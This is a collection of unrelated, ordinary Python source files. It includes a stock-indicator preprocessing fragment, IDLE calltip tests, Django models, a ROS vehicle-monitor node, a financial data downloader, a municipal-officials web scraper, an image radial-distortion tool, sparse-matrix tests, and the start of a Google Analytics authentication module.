df[training_size:].to_csv(file_path / 'cross_validation.csv', encoding='utf-8', index=False)
return file_path
def _macd(self, df, close):
macd = MACD(close=close)
df['macd'] = macd.macd()
df['macd_signal'] = macd.macd_signal()
df['macd_diff'] = macd.macd_diff()
def _bollinger_bands(self, df, close):
bb = BollingerBands(close=close)
df['bb_bbm'] = bb.bollinger_mavg()
df['bb_bbh'] = bb.bollinger_hband()
df['bb_bbl'] = bb.bollinger_lband()
def _rsi(self, df, close):
rsi = RSIIndicator(close=close)
df['rsi'] = rsi.rsi()
|
"Test calltip, coverage 60%"
from idlelib import calltip
import unittest
import textwrap
import types
import re
# Test Class TC is used in multiple get_argspec test methods
class TC():
'doc'
tip = "(ai=None, *b)"
def __init__(self, ai=None, *b): 'doc'
__init__.tip = "(self, ai=None, *b)"
def t1(self): 'doc'
t1.tip = "(self)"
def t2(self, ai, b=None): 'doc'
t2.tip = "(self, ai, b=None)"
def t3(self, ai, *args): 'doc'
t3.tip = "(self, ai, *args)"
def t4(self, *args): 'doc'
t4.tip = "(self, *args)"
def t5(self, ai, b=None, *args, **kw): 'doc'
t5.tip = "(self, ai, b=None, *args, **kw)"
def t6(no, self): 'doc'
t6.tip = "(no, self)"
def __call__(self, ci): 'doc'
__call__.tip = "(self, ci)"
def nd(self): pass # No doc.
# attaching .tip to wrapped methods does not work
@classmethod
def cm(cls, a): 'doc'
@staticmethod
def sm(b): 'doc'
tc = TC()
default_tip = calltip._default_callable_argspec
get_spec = calltip.get_argspec
class Get_argspecTest(unittest.TestCase):
# The get_spec function must return a string, even if blank.
# Test a variety of objects to be sure that none cause it to raise
# (quite aside from getting as correct an answer as possible).
# The tests of builtins may break if inspect or the docstrings change,
# but a red buildbot is better than a user crash (as has happened).
# For a simple mismatch, change the expected output to the actual.
def test_builtins(self):
def tiptest(obj, out):
self.assertEqual(get_spec(obj), out)
# Python class that inherits builtin methods
class List(list): "List() doc"
# Simulate builtin with no docstring for default tip test
class SB: __call__ = None
if List.__doc__ is not None:
tiptest(List,
f'(iterable=(), /){calltip._argument_positional}'
f'\n{List.__doc__}')
tiptest(list.__new__,
'(*args, **kwargs)\n'
'Create and return a new object. '
'See help(type) for accurate signature.')
tiptest(list.__init__,
'(self, /, *args, **kwargs)'
+ calltip._argument_positional + '\n' +
'Initialize self. See help(type(self)) for accurate signature.')
append_doc = (calltip._argument_positional
+ "\nAppend object to the end of the list.")
tiptest(list.append, '(self, object, /)' + append_doc)
tiptest(List.append, '(self, object, /)' + append_doc)
tiptest([].append, '(object, /)' + append_doc)
tiptest(types.MethodType, "method(function, instance)")
tiptest(SB(), default_tip)
p = re.compile('')
tiptest(re.sub, '''\
(pattern, repl, string, count=0, flags=0)
Return the string obtained by replacing the leftmost
non-overlapping occurrences of the pattern in string by the
replacement repl. repl can be either a string or a callable;
if a string, backslash escapes in it are processed. If it is
a callable, it's passed the Match object and must return''')
tiptest(p.sub, '''\
(repl, string, count=0)
Return the string obtained by replacing the leftmost \
non-overlapping occurrences o...''')
def test_signature_wrap(self):
if textwrap.TextWrapper.__doc__ is not None:
self.assertEqual(get_spec(textwrap.TextWrapper), '''\
(width=70, initial_indent='', subsequent_indent='', expand_tabs=True,
replace_whitespace=True, fix_sentence_endings=False, break_long_words=True,
drop_whitespace=True, break_on_hyphens=True, tabsize=8, *, max_lines=None,
placeholder=' [...]')''')
def test_properly_formated(self):
def foo(s='a'*100):
pass
def bar(s='a'*100):
"""Hello Guido"""
pass
def baz(s='a'*100, z='b'*100):
pass
indent = calltip._INDENT
sfoo = "(s='aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"\
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\n" + indent + "aaaaaaaaa"\
"aaaaaaaaaa')"
sbar = "(s='aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"\
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\n" + indent + "aaaaaaaaa"\
"aaaaaaaaaa')\nHello Guido"
sbaz = "(s='aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"\
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\n" + indent + "aaaaaaaaa"\
"aaaaaaaaaa', z='bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb"\
"bbbbbbbbbbbbbbbbb\n" + indent + "bbbbbbbbbbbbbbbbbbbbbb"\
"bbbbbbbbbbbbbbbbbbbbbb')"
for func,doc in [(foo, sfoo), (bar, sbar), (baz, sbaz)]:
with self.subTest(func=func, doc=doc):
self.assertEqual(get_spec(func), doc)
def test_docline_truncation(self):
def f(): pass
f.__doc__ = 'a'*300
self.assertEqual(get_spec(f), f"()\n{'a'*(calltip._MAX_COLS-3) + '...'}")
def test_multiline_docstring(self):
# Test fewer lines than max.
self.assertEqual(get_spec(range),
"range(stop) -> range object\n"
"range(start, stop[, step]) -> range object")
# Test max lines
self.assertEqual(get_spec(bytes), '''\
bytes(iterable_of_ints) -> bytes
bytes(string, encoding[, errors]) -> bytes
bytes(bytes_or_buffer) -> immutable copy of bytes_or_buffer
bytes(int) -> bytes object of size given by the parameter initialized with null bytes
bytes() -> empty bytes object''')
# Test more than max lines
def f(): pass
f.__doc__ = 'a\n' * 15
self.assertEqual(get_spec(f), '()' + '\na' * calltip._MAX_LINES)
def test_functions(self):
def t1(): 'doc'
t1.tip = "()"
def t2(a, b=None): 'doc'
t2.tip = "(a, b=None)"
def t3(a, *args): 'doc'
t3.tip = "(a, *args)"
def t4(*args): 'doc'
t4.tip = "(*args)"
def t5(a, b=None, *args, **kw): 'doc'
t5.tip = "(a, b=None, *args, **kw)"
doc = '\ndoc' if t1.__doc__ is not None else ''
for func in (t1, t2, t3, t4, t5, TC):
with self.subTest(func=func):
self.assertEqual(get_spec(func), func.tip + doc)
def test_methods(self):
doc = '\ndoc' if TC.__doc__ is not None else ''
for meth in (TC.t1, TC.t2, TC.t3, TC.t4, TC.t5, TC.t6, TC.__call__):
with self.subTest(meth=meth):
self.assertEqual(get_spec(meth), meth.tip + doc)
self.assertEqual(get_spec(TC.cm), "(a)" + doc)
self.assertEqual(get_spec(TC.sm), "(b)" + doc)
def test_bound_methods(self):
# test that first parameter is correctly removed from argspec
doc = '\ndoc' if TC.__doc__ is not None else ''
for meth, mtip in ((tc.t1, "()"), (tc.t4, "(*args)"),
(tc.t6, "(self)"), (tc.__call__, '(ci)'),
(tc, '(ci)'), (TC.cm, "(a)"),):
with self.subTest(meth=meth, mtip=mtip):
self.assertEqual(get_spec(meth), mtip + doc)
def test_starred_parameter(self):
# test that starred first parameter is *not* removed from argspec
class C:
def m1(*args): pass
c = C()
for meth, mtip in ((C.m1, '(*args)'), (c.m1, "(*args)"),):
with self.subTest(meth=meth, mtip=mtip):
self.assertEqual(get_spec(meth), mtip)
def test_invalid_method_get_spec(self):
class C:
def m2(**kwargs): pass
class Test:
def __call__(*, a): pass
mtip = calltip._invalid_method
self.assertEqual(get_spec(C().m2), mtip)
self.assertEqual(get_spec(Test()), mtip)
def test_non_ascii_name(self):
# test that re works to delete a first parameter name that
# includes non-ascii chars, such as various forms of A.
uni = "(A\u0391\u0410\u05d0\u0627\u0905\u1e00\u3042, a)"
assert calltip._first_param.sub('', uni) == '(a)'
def test_no_docstring(self):
for meth, mtip in ((TC.nd, "(self)"), (tc.nd, "()")):
with self.subTest(meth=meth, mtip=mtip):
self.assertEqual(get_spec(meth), mtip)
def test_attribute_exception(self):
class NoCall:
def __getattr__(self, name):
raise BaseException
class CallA(NoCall):
def __call__(oui, a, b, c):
pass
class CallB(NoCall):
def __call__(self, ci):
pass
for meth, mtip in ((NoCall, default_tip), (CallA, default_tip),
(NoCall(), ''), (CallA(), '(a, b, c)'),
(CallB(), '(ci)')):
with self.subTest(meth=meth, mtip=mtip):
self.assertEqual(get_spec(meth), mtip)
def test_non_callables(self):
for obj in (0, 0.0, '0', b'0', [], {}):
with self.subTest(obj=obj):
self.assertEqual(get_spec(obj), '')
class Get_entityTest(unittest.TestCase):
def test_bad_entity(self):
self.assertIsNone(calltip.get_entity('1/0'))
def test_good_entity(self):
self.assertIs(calltip.get_entity('int'), int)
if __name__ == '__main__':
unittest.main(verbosity=2)
|
from django.db import models
from django.contrib.auth.models import User
# Create your models here.
class Profile(models.Model):
profile_photo = models.ImageField()
bio = models.CharField(max_length = 60)
user = models.OneToOneField(User,on_delete=models.CASCADE)
def __str__(self):
return self.bio
def save_profile(self):
self.save()
def delete_profile(self):
self.delete()
@classmethod
def search_profile(cls,search_term):
user = cls.objects.filter(user__icontains = search_term)
return user
class Image(models.Model):
images = models.ImageField()
name = models.CharField(max_length = 60)
caption = models.CharField(max_length = 100)
likes = models.IntegerField()
date = models.DateTimeField(auto_now_add=True)
profile = models.ForeignKey(User,on_delete=models.CASCADE)
def __str__(self):
return self.name
def save_image(self):
self.save()
def delete_image(self):
self.delete()
def likes_total(self):
self.likes.count()
@classmethod
def search_image(cls,search_term):
images = cls.objects.filter(name__icontains = search_term)
return images
@classmethod
def all_comment(self):
return self.comment.all()
class Comment(models.Model):
comment = models.CharField(max_length = 100)
date = models.DateTimeField(auto_now_add=True)
profile = models.ForeignKey(User,on_delete=models.CASCADE)
def __str__(self):
return self.comment
def save_comment(self):
self.save()
def delete_comment(self):
self.delete()
@classmethod
def get_comment(cls):
comment = cls.objects.all()
return comment
class NewsLetterEnts(models.Model):
name = models.CharField(max_length = 30)
email = models.EmailField() |
# Generated by Django 3.0.5 on 2021-11-22 11:23
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('library', '0008_auto_20200412_1408'),
]
operations = [
migrations.AlterField(
model_name='book',
name='category',
field=models.CharField(choices=[('education', 'Education'), ('entertainment', 'Entertainment'), ('comics', 'Comics'), ('biography', 'Biography'), ('history', 'History'), ('novel', 'Novel'), ('fantasy', 'Fantasy'), ('thriller', 'Thriller'), ('romance', 'Romance'), ('scifi', 'Sci-Fi')], default='education', max_length=30),
),
]
|
#!/usr/bin/env python
import rospy
import socket
from math import sqrt
from mavros_msgs.msg import RCIn
from sensor_msgs.msg import NavSatFix
from diagnostic_msgs.msg import DiagnosticArray, DiagnosticStatus
from system_monitor.msg import VehicleState
'''
This node verifies health for all modules, according to each module's monitors, and reports overall vehicle status
Statuses are:
0 - Error (when one of the peripheral sensor modules fails for some reason)
1 - Boot (initial state, vehicle waits for GPS fix and for sensor modules to report OK/Warning status)
2 - Service (Vehicle is operational)
3 - Recording (special state, only activated through an RC command)
'''
status_dict = {0: 'OK', 1: 'Warning', 2: 'Error', 3: 'Stale'}
class FSM:
def __init__(self, **kwargs):
# Initial FSM state
self.state = VehicleState.ERROR
self.statedesc = 'ERROR'
self.statename = 'Initializing'
# ROS rate (1 Hz)
self.rate = rospy.Rate(1)
# Parameters
self.vehicle_name = socket.gethostname()
self.fix_topic = rospy.get_param("asv_description/fix_topic", default='/mavros/global_position/raw/fix')
self.rec_topic = rospy.get_param("asv_description/record_command_topic", default='/mavros/rc/in')
self.rec_cmd_channel = rospy.get_param("asv_description/record_command_channel", default=5) - 1
self.rec_cmd_threshold = rospy.get_param("asv_description/record_command_threshold", default=20)
# Publishers and subscribers
self.status_pub = rospy.Publisher('/%s/vehicle/state' % socket.gethostname(), VehicleState, queue_size=10)
self.diag_agg_sub = rospy.Subscriber('/diagnostics_agg', DiagnosticArray, callback=self.diag_callback)
self.diag_agg_sub = rospy.Subscriber('/diagnostics_toplevel_state', DiagnosticStatus, callback=self.diag_toplevel_callback)
self.rec_cmd_sub = rospy.Subscriber(self.rec_topic, RCIn, callback=self.rec_callback)
self.fix_sub = rospy.Subscriber(self.fix_topic, NavSatFix, callback=self.fix_callback)
# Messages
self.rec_msg = RCIn()
self.diag_agg_msg = DiagnosticArray()
self.diag_toplevel_msg = DiagnosticStatus()
self.vehicle_state = VehicleState()
self.fix_msg = NavSatFix()
# Subscriber callbacks
def rec_callback(self, msg):
self.rec_msg = msg
def diag_callback(self, msg):
self.diag_agg_msg = msg
def diag_toplevel_callback(self, msg):
self.diag_toplevel_msg = msg
def fix_callback(self, msg):
self.fix_msg = msg
def check_rec_cmd(self):
# Check if RC PWM channel is within a certain threshold
try:
if self.rec_msg.channels[self.rec_cmd_channel] > self.rec_cmd_threshold:
return True
else:
return False
except IndexError:
return False
# Calculates top level state as mean of all levels
def check_mod_health(self):
toplevel = 0
unhealthy = ''
for diag in self.diag_agg_msg.status:
# If some module is in error, append to a string
if diag.level > 1:
toplevel = 2
unhealthy += '%s; ' % diag.name
return toplevel, unhealthy
# Main FSM function
def run(self):
# Get modules' health
toplevel, unhealthy = self.check_mod_health()
# Finite state machine (FSM)
if self.state == VehicleState.ERROR:
# If all modules are online (toplevel status is warning or OK)
if toplevel <= 1:
self.state = VehicleState.BOOT
self.statename = 'BOOT'
self.statedesc = 'Waiting for GPS fix'
elif self.state == VehicleState.BOOT:
# If modules are healthy and GPS is fix
if toplevel <= 1 and self.fix_msg.status.status >= 0:
self.state = VehicleState.SERVICE
self.statename = 'SERVICE'
self.statedesc = 'Vehicle operational'
elif self.state == VehicleState.SERVICE:
# Check GPS diag level is error or stale
if self.fix_msg.status.status < 0:
self.state = VehicleState.BOOT
self.statename = 'BOOT'
self.statedesc = 'Waiting for GPS fix'
# Check if record command on RC is enabled
if self.check_rec_cmd():
self.state = VehicleState.RECORDING
self.statename = 'RECORDING'
self.statedesc = 'Vehicle logging data'
elif self.state == VehicleState.RECORDING:
if not self.check_rec_cmd():
self.state = VehicleState.SERVICE
self.statename = 'SERVICE'
self.statedesc = 'Vehicle operational'
# Check diagnostics for errors
if toplevel > 1:
self.state = VehicleState.ERROR
self.statename = 'ERROR'
self.statedesc = unhealthy
# Publish current vehicle status
self.vehicle_state.header.stamp = rospy.Time.now()
self.vehicle_state.name = self.statename
self.vehicle_state.id = self.state
self.vehicle_state.description = self.statedesc
self.status_pub.publish(self.vehicle_state)
# Sleep for some time
self.rate.sleep()
if __name__ == '__main__':
rospy.init_node('vehicle_monitor', anonymous=True)
fsm = FSM()
# Run FSM while ros node is active
while not rospy.is_shutdown():
fsm.run()
|
#!/usr/bin/python
print('EV - initiating.')
import os
import pandas as pd
cwd = os.getcwd()
input_folder = "0_input"
prices_folder = "data"
output_folder = "0_output"
temp_folder = "temp"
temp_EV = "EV"
token_df = pd.read_csv(os.path.join(cwd,"0_api_token.csv"))
token = token_df.iloc[0,1]
url1 = "https://financialmodelingprep.com/api/v3/enterprise-values/"
apikey = "apikey="
amp = "&"
csv = "?datatype=csv"
period_q = "period=quarter"
# prepare tickers list
tickers_narrowed = pd.read_csv(os.path.join(cwd,"0_symbols.csv"))
ticker_narrowed = tickers_narrowed.values.tolist()
tickers = ' '.join(tickers_narrowed["symbol"].astype(str)).strip()
# find last updated ticker (this is necessary if you lose internet connection, etc)
last_ticker = pd.read_csv(os.path.join(cwd,input_folder,temp_folder,"EV_last_ticker.csv"),index_col=0)
last_ticker_n = last_ticker.values[0]
last_ticker_nn = last_ticker_n[0]
print("last ticker in other was number", last_ticker_nn)
# start importing
index_max = pd.to_numeric(tickers_narrowed.index.values.max())
for t in tickers.split(' '):
try:
n = pd.to_numeric(tickers_narrowed["symbol"][tickers_narrowed["symbol"] == t].index).values
if n > last_ticker_nn:
final_url = url1 + t + csv+ amp + period_q + amp + apikey + token
df = pd.read_csv(final_url)
df['symbol'] = t
name = t + ".csv"
df.to_csv(os.path.join(cwd, input_folder, temp_folder, temp_EV, name))
# print & export last_n
nn = n[0] # get number out of numpy.array
nnn = round(nn/index_max*100,1)
print("EV_q:", t, "/" ,nn, "from", index_max, "/", nnn, "%")
last_ticker = pd.DataFrame({'number':n})
last_ticker.to_csv(os.path.join(cwd, input_folder, temp_folder, "EV_last_ticker.csv"))
except:
pass
prices_last_ticker = pd.DataFrame({'number': [0] })
prices_last_ticker.to_csv(os.path.join(cwd,input_folder,temp_folder,"EV_last_ticker.csv"))
print('EV - done')
|
import scrapy
from alleco.objects.official import Official
from alleco.objects.official import getAllText
from re import sub
class monroeville_b(scrapy.Spider):
name = "monroeville_b"
muniName = "MONROEVILLE"
muniType = "BOROUGH"
complete = True
def start_requests(self):
urls = ['https://www.monroeville.pa.us/elected.htm']
for url in urls:
yield scrapy.Request(url=url, callback=self.parse)
def parse(self, response):
counter = 0
for quote in response.xpath('//td[@width="609"]/table'):
names = [sub(r"\s+"," ",i) for i in getAllText(quote)]
if counter==0: names = names[1:5]
emails = [i for i in quote.xpath('.//a/@href').getall() if "mailto:" in i]
counter += 1
for x in range(len(names)//4):
yield Official(
muniName=self.muniName,
muniType=self.muniType,
office="MEMBER OF COUNCIL" if "Council" in names[x*4+1] else names[x*4+1].upper(),
name=names[x*4],
email=emails[x],
district="AT-LARGE" if "Ward" not in names[x*4+1] else names[x*4+1][:6].upper(),
phone=names[x*4+2],
url=response.url)
|
import turtle as t
"""
多行
注释
可以
不错
"""
# 单行注释
print('Hello World')
# t.setup(width=0.6, height=0.6)
# t.pensize(4)
# t.pencolor('red')
# t.forward(100)
# t.right(90)
# t.forward(100)
# t.right(90)
# t.forward(100)
# t.right(90)
# t.forward(100)
# t.mainloop()
message = "hello world again"
print(message.islower())
firstName = " ada "
lastName = " love "
fullName = f"{firstName.strip()} {lastName.strip()}"
print(fullName)
# t.color("red", "yellow")
# t.speed(10)
# t.begin_fill()
# for _ in range(50):
# t.forward(200)
# t.left(170)
# t.end_fill()
# t.mainloop()
testList = ["A", "B", "Hi", "B", "CDE"]
print(testList)
testList.append("DDD")
print(testList)
testList.pop()
print(testList)
testList.remove("B")
print(testList)
del testList[0]
print(testList)
print(sorted(testList))
testList.sort()
print(testList)
testList.reverse()
print(testList)
print(len(testList))
for item in testList:
print(f"Hello this is {item.lower()}")
squares = [item ** item for item in range(1, 190)]
print(squares)
myTuple = ("Hell0", "World", 123)
print(myTuple)
tuple2 = tuple()
|
"""Remove radial distortion.
"""
from __future__ import division
import scipy as sp
import scipy.optimize
import scipy.ndimage
from skimage.transform import warp
import matplotlib.pyplot as plt
import numpy as np
import math
import sys
class RadialDistortionInterface:
"""Mouse interaction interface for radial distortion removal.
"""
def __init__(self, img):
height, width = img.shape[:2]
self.figure = plt.imshow(img, extent=(0, width, height, 0))
plt.title('Removal of radial distortion')
plt.xlabel('Select sets of three points with left mouse button,\n'
'click right button to process.')
plt.connect('button_press_event', self.button_press)
plt.connect('motion_notify_event', self.mouse_move)
self.img = np.atleast_3d(img)
self.points = []
self.centre = np.array([(width - 1)/2., (height - 1)/2.])
self.height = height
self.width = width
self.make_cursorline()
self.figure.axes.set_autoscale_on(False)
plt.show()
plt.close()
def make_cursorline(self):
self.cursorline, = plt.plot([0],[0],'r:+',
linewidth=2,markersize=15,markeredgecolor='b')
def button_press(self,event):
"""Register mouse clicks.
"""
if (event.button == 1 and event.xdata and event.ydata):
self.points.append((event.xdata,event.ydata))
print("Coordinate entered: (%f,%f)" % (event.xdata, event.ydata))
if len(self.points) % 3 == 0:
plt.gca().lines.append(self.cursorline)
self.make_cursorline()
if (event.button != 1 and len(self.points) >= 3):
print("Removing distortion...")
plt.gca().lines = []
plt.draw()
self.remove_distortion()
self.points = []
def mouse_move(self,event):
"""Handle cursor drawing.
"""
pt_sets, pts_last_set = divmod(len(self.points),3)
pts = np.zeros((3,2))
if pts_last_set > 0:
# Line follows up to 3 clicked points:
pts[:pts_last_set] = self.points[-pts_last_set:]
# The last point of the line follows the mouse cursor
pts[pts_last_set:] = [event.xdata,event.ydata]
self.cursorline.set_data(pts[:,0], pts[:,1])
plt.draw()
def remove_distortion(self, reshape=True):
def radial_tf(xy, p):
"""Radially distort coordinates.
Given a coordinate (x,y), apply the radial distortion defined by
L(r) = 1 + p[2]r + p[3]r^2 + p[4]r^3
where
r = sqrt((x-p[0])^2 + (y-p[1])^2)
so that
x' = L(r)x and y' = L(r)y
Parameters
----------
xy : (M, 2) ndarray
Input coordinates.
p : tuple
Warp parameters:
- p[0],p[1] -- Distortion centre
- p[2], p[3], p[4] -- Radial distortion parameters
Returns
-------
xy : (M, 2) ndarray
Radially warped coordinates.
"""
xy = np.array(xy, ndmin=2, copy=False)
x = xy[:, 0]
y = xy[:, 1]
x = x - p[0]
y = y - p[1]
r = np.sqrt(x**2 + y**2)
f = 1 + p[2]*r + p[3]*r**2 + p[4]*r**3
return np.array([x*f + p[0], y*f + p[1]]).T
def height_difference(p):
"""Measure deviation of distorted data points from straight line.
References
----------
http://paulbourke.net/geometry/pointlineplane/
"""
out = 0
for sets in 3 * np.arange(len(self.points) // 3):
pts = np.array(self.points[sets:sets+3])
xy = radial_tf(pts, p)
x, y = xy[:, 0], xy[:, 1]
x, y = xy.T
# Find point on line (point0 <-> point2) closest to point1 (midpoint)
u0 = ((x[0] - x[2])**2 + (y[0] - y[2])**2)
if u0 == 0:
return 1
u = ((x[1] - x[0]) * (x[2] - x[0]) + \
(y[1] - y[0]) * (y[2] - y[0])) / u0
# Intersection point
ip_x = x[0] + u * (x[2] - x[0])
ip_y = y[0] + u * (y[2] - y[0])
# Distance between tip of triangle and and midpoint
out += (ip_x - x[1])**2 + (ip_y - y[1])**2
return out
# Find the distortion parameters for which the data points lie on a
# straight line
rc = sp.optimize.fmin(height_difference,
[self.centre[0], self.centre[1], 0., 0., 0.])
# Determine inverse coefficient
xy = np.array([np.linspace(0, self.width),
np.linspace(0, self.height)]).T
def inv_min(p):
# Take coordinates from a straight line and transform
# to the "restored" domain with known rc
xy_tf = radial_tf(xy, rc)
# Transform back to the original image domain,
# this time with the parameters p to be estimated
xy_tf_back = radial_tf(xy_tf, p)
return np.sum((xy_tf_back - xy)**2)
# Find reverse transform via optimization
rci = sp.optimize.fmin(inv_min, [rc[0], rc[1], 0., 0., 0.])
# Find extents of forward transform
out_shape = np.array((self.height, self.width))
if reshape:
top_corner = radial_tf([0., 0.], rc)
bottom_corner = radial_tf([self.width - 1, self.height-1], rc)
out_shape = (bottom_corner - top_corner)[0, ::-1]
def radial_tf_shifted(xy, p):
xy += top_corner
xy = radial_tf(xy, p)
return xy
restored_image = warp(self.img, radial_tf_shifted, {'p': rci},
output_shape=out_shape.astype(int))
plt.figure()
plt.imshow(restored_image)
# Plot forward and reverse transforms
x = np.linspace(self.width / 2, self.width)
y = np.linspace(self.height / 2, self.height)
r = np.sqrt((x - self.centre[0])**2 + (y - self.centre[1])**2)
xy = np.array([x, y]).T
xyr = radial_tf(xy, rc) - self.centre
xyri = radial_tf(xy, rci) - self.centre
rf = np.hypot(*xyr.T)
rr = np.hypot(*xyri.T)
a = plt.axes([0.15,.15,.15,.15])
plt.plot(r, rf, label='Forward mapping')
plt.plot(r, rr, ':', label='Reverse mapping')
plt.grid()
#plt.xlabel('Input radius')
#plt.ylabel('Transformed radius')
#plt.legend()
#plt.setp(a, xticks=[], yticks=[])
plt.show()
from skimage.io import imread
if len(sys.argv) != 2:
print("Usage: %s <image-file>" % sys.argv[0])
else:
img = imread(sys.argv[1])
rdi = RadialDistortionInterface(img)
|
from numpy import array, abs
try:
import hermes_common._hermes_common
normal_import = True
except ImportError:
normal_import = False
if normal_import:
# Running in h1d, h2d or h3d:
from hermes_common._hermes_common import CooMatrix, CSRMatrix, CSCMatrix
else:
# Running from inside hermes_common
from _hermes_common import CooMatrix, CSRMatrix, CSCMatrix
eps = 1e-10
def _eq(a, b):
return (abs(a-b) < eps).all()
def _coo_conversions_test(m, d2):
# test the COO matrix
d1 = m.to_scipy_coo().todense()
assert _eq(d1, d2)
# test conversion from COO
n = CSRMatrix(m)
d1 = n.to_scipy_csr().todense()
assert _eq(d1, d2)
n = CSCMatrix(m)
d1 = n.to_scipy_csc().todense()
assert _eq(d1, d2)
# test conversion CSC <-> CSR
n = CSRMatrix(n)
d1 = n.to_scipy_csr().todense()
assert _eq(d1, d2)
n = CSCMatrix(n)
d1 = n.to_scipy_csc().todense()
assert _eq(d1, d2)
def test_matrix1():
m = CooMatrix(5)
m.add(1, 3, 3.5)
m.add(2, 3, 4.5)
m.add(3, 4, 1.5)
m.add(4, 2, 1.5)
m.add(2, 3, 1)
d2 = array([
[0, 0, 0, 0, 0],
[0, 0, 0, 3.5, 0],
[0, 0, 0, 5.5, 0],
[0, 0, 0, 0, 1.5],
[0, 0, 1.5, 0, 0],
])
_coo_conversions_test(m, d2)
def test_matrix2():
m = CooMatrix(5)
m.add(1, 3, 3.5)
m.add(2, 3, 4.5)
m.add(3, 4, 1.5)
m.add(0, 2, 1.5)
m.add(2, 3, 1)
d2 = array([
[0, 0, 1.5, 0, 0],
[0, 0, 0, 3.5, 0],
[0, 0, 0, 5.5, 0],
[0, 0, 0, 0, 1.5],
[0, 0, 0, 0, 0],
])
_coo_conversions_test(m, d2)
def test_matrix3():
m = CooMatrix(5)
m.add(0, 0, 2)
m.add(0, 1, 3)
m.add(1, 0, 3)
m.add(1, 2, 4)
m.add(1, 4, 6)
m.add(2, 1, -1)
m.add(2, 2, -3)
m.add(2, 3, 2)
m.add(3, 2, 1)
m.add(4, 1, 4)
m.add(4, 2, 2)
m.add(4, 4, 1)
d2 = array([
[2, 3, 0, 0, 0],
[3, 0, 4, 0, 6],
[0,-1,-3, 2, 0],
[0, 0, 1, 0, 0],
[0, 4, 2, 0, 1],
])
_coo_conversions_test(m, d2)
# CSR test:
m = CSRMatrix(m)
assert _eq(m.IA, [0, 2, 5, 8, 9, 12])
assert _eq(m.JA, [0, 1, 0, 2, 4, 1, 2, 3, 2, 1, 2, 4])
assert _eq(m.A, [2, 3, 3, 4, 6, -1, -3, 2, 1, 4, 2, 1])
# CSC test:
m = CSCMatrix(m)
assert _eq(m.JA, [0, 2, 5, 9, 10, 12])
assert _eq(m.IA, [0, 1, 0, 2, 4, 1, 2, 3, 4, 2, 1, 4])
assert _eq(m.A, [2, 3, 3, -1, 4, 4, -3, 1, 2, 2, 6, 1])
def test_matrix4():
m = CooMatrix(5, is_complex=True)
m.add(1, 3, 3.5)
m.add(2, 3, 4.5)
m.add(3, 4, 1.5)
m.add(4, 2, 1.5)
m.add(2, 3, 1)
d2 = array([
[0, 0, 0, 0, 0],
[0, 0, 0, 3.5, 0],
[0, 0, 0, 5.5, 0],
[0, 0, 0, 0, 1.5],
[0, 0, 1.5, 0, 0],
])
_coo_conversions_test(m, d2)
def test_matrix5():
m = CooMatrix(5, is_complex=True)
m.add(1, 3, 3.5)
m.add(2, 3, 4.5)
m.add(3, 4, 1.5)
m.add(0, 2, 1.5)
m.add(2, 3, 1)
d2 = array([
[0, 0, 1.5, 0, 0],
[0, 0, 0, 3.5, 0],
[0, 0, 0, 5.5, 0],
[0, 0, 0, 0, 1.5],
[0, 0, 0, 0, 0],
])
_coo_conversions_test(m, d2)
def test_matrix6():
m = CooMatrix(5, is_complex=True)
m.add(1, 3, 3.5+1j)
m.add(2, 3, 4.5+2j)
m.add(3, 4, 1.5+3j)
m.add(0, 2, 1.5+4j)
m.add(2, 3, 1)
d2 = array([
[0, 0, 1.5+4j, 0, 0],
[0, 0, 0, 3.5+1j, 0],
[0, 0, 0, 5.5+2j, 0],
[0, 0, 0, 0, 1.5+3j],
[0, 0, 0, 0, 0],
])
_coo_conversions_test(m, d2)
def test_matrix7():
m = CooMatrix(5, is_complex=True)
m.add(1, 3, 3.5+1j)
m.add(2, 3, 4.5+2j)
m.add(3, 4, 1.5+3j)
m.add(1, 3, 1.5+4j)
m.add(2, 3, 1+4j)
d2 = array([
[0, 0, 0, 0, 0],
[0, 0, 0, 5+5j, 0],
[0, 0, 0, 5.5+6j, 0],
[0, 0, 0, 0, 1.5+3j],
[0, 0, 0, 0, 0],
])
_coo_conversions_test(m, d2)
|
"""
Allows users to authenticate a service account or installed application using
either:
* A .json key file for service accounts (must be in root directory of
where your script is run)
* A .env file with a path to the .json key for service accounts
* If no .env file is provided the environment variables will be checked
for `GOOGLE_APPLICATION_CREDENTIALS`
* A .json oauth2 credentials file for installed applications (must be in
root directory of where your script is run)
Examples:
To authenticate and retrieve a Google API service with a service account::
import gapipy as ga
# For .json files, from_service=True is on by default
service = ga.authenticate(fileName="example.json")
# For .env files
service = ga.authenticate()
To authenticate and retrieve a Google API service with a installed
application::
import gapipy as ga
# Must always provide from_service=False and a file name
service = ga.authenticate(fileName="example.json")
Attributes:
BASEDIR (os.path): Gets the working directory of where the module is
imported to. This allows the authentication process
to find a specified .json or .env file.
DEFAULT_SCOPE (list): List of scopes that will define what the
authenticated service can access. Access to profile,
email and openid is
needed with oauth2 verification.
REQUIRED_ENV_VAR (string): Name of required environment variable for service
account authentication from environment. Variable
should point to the absolute path of the .json
file.
API_NAME (string): Specifies the [Google Analytics Reporting API]
(https://developers.google.com/analytics/devguides/reporting/core/v4/).
The Google Analytics API v3 is still available but it is
recommended to use the Reporting API to get full access
to features.
API_VERSION (string): Specifies the latest version of the Reporting API.
"""
import os
from google.oauth2 import service_account
from googleapiclient import discovery
from google_auth_oauthlib.flow import InstalledAppFlow
from google import auth
from dotenv import load_dotenv
BASEDIR = os.getcwd()
DEFAULT_SCOPE = ['https://www.googleapis.com/auth/analytics.readonly',
'https://www.googleapis.com/auth/userinfo.profile',
'https://www.googleapis.com/auth/userinfo.email',
'openid'
]
REQUIRED_ENV_VAR = "GOOGLE_APPLICATION_CREDENTIALS"
API_NAME = "analyticsreporting"
API_VERSION = "v4"
def authenticate(from_service=True, fileName=None):
"""
The primary function to authenticate a Google Analytics Reporting API
service. Provides a way to authenticate service accounts
(.json/.env/environment variables) and installed applications (.json).
Args:
from_service (bool, optional): Flag to specify whether authentication
is from a service account or from an
installed application. Defaults to True.
fileName (string, optional): Name of the .json file that has either
the service account key or the client
